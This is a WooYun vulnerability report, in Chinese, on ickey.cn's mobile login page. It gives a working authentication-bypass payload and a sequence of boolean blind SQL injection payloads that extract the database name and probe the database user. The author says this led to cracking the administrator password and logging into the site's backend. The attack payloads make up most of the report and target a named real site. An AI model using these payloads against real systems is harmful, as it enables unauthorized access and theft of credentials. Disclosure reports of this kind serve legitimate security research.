WooYun.org

经过测试，发现ickey主站有waf防止注入。
但是post注入是没有禁止的。
其实发现的过程是挺有意思的。
首先注册了个号test/admin888
在http://www.ickey.cn/mobile/?action=login 登录
我首先测试帐号处输入test' or '1'='1 密码输入123456
神奇的事情发生了，数据库把密码为123456的第一个用户登录上去了。

我们上首页正常登录该用户试试

无压力了，所以通过此注入可以登录任意密码的用户。
********************
这才是测试阶段，仅能证明登录任意密码的第一个用户。
下面我们测试sql注入。
********************
此注入点是post盲注
下面尝试猜解当前数据库名
test' and (length(database())>7)# 正常
test' and (length(database())>8)# 错误
判断当前数据库名为8位
and (select ASCII(SUBSTR(database(),1,1)))>104# 正常
and (select ASCII(SUBSTR(database(),1,1)))>105# 错误
判断第一位ascii是i
同理得出数据库名为ickeynew
再猜解当前用户
and (length(user())>15)# 正常
and (length(user())>16)# 错误
上工具

成功解密管理员密码，并登录后台。
测试时候已经是半夜2点钟。
维护人员居然很快就发现，并及时更改了密码，赞一个。
所以没办法发后台截图了。